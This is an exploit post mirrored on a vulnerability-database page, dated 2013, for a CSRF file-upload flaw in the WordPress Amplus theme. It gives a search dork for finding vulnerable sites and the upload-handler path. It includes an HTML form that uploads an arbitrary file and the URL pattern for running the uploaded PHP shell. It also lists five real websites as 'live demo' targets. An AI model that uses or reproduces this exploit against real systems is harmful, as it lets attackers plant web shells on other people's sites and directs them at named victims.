Lucene search
K

WordPress Amplus Cross Site Request Forgery Vulnerability

🗓️ 17 Nov 2013 00:00:00Reported by DevilScreaMType 
zdt
 zdt
🔗 0day.today👁 20 Views

WordPress Amplus themes CSRF file upload vulnerability. File upload through CSRF on amplus wordpress theme allows remote attackers to upload and execute arbitrary PHP code via a crafted image file

Code
#Title : Wordpress Amplus Themes CSRF File Upload Vulnerability

#Author : DevilScreaM

#Date : 11/17/2013 - 17 November 2013

#Category : Web Applications

#Type : PHP

#Vendor : http://themeforest.net

#Download : http://themeforest.net/item/amplus-responsive-multilingual-wordpress-theme/

#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
     Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber

#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |

#Tested : Mozila, Chrome, Opera -> Windows & Linux

#Vulnerabillity : CSRF

#Dork : 

inurl:wp-content/themes/amplus


CSRF File Upload Vulnerability

Exploit & POC : 

http://site-target/wp-content/themes/amplus/functions/upload-handler.php

Script :

<form enctype="multipart/form-data"
action="http://127.0.0.1/wp-content/themes/amplus/functions/upload-handler.php" method="post"> 
Your File: <input name="uploadfile" type="file" /><br /> 
<input type="submit" value="upload" /> 
</form> 


File Access :

http://site-target/uploads/[years]/[month]/your_shell.php

Example : http://127.0.0.1/wp-content/uploads/2013/11/devilscream.php

Live Demo :

http://telplus-inc.com/blog/wp-content/themes/amplus/functions/upload-handler.php
http://intuneautoworks.com/home/wp-content/themes/amplus/functions/upload-handler.php
http://wnglaw.com/wp-content/themes/amplus/functions/upload-handler.php
http://amaboston.org/wp-content/themes/amplus/functions/upload-handler.php
http://tenniswithlegeorge.com/wp-content/themes/amplus/functions/upload-handler.php

#  0day.today [2018-04-12]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation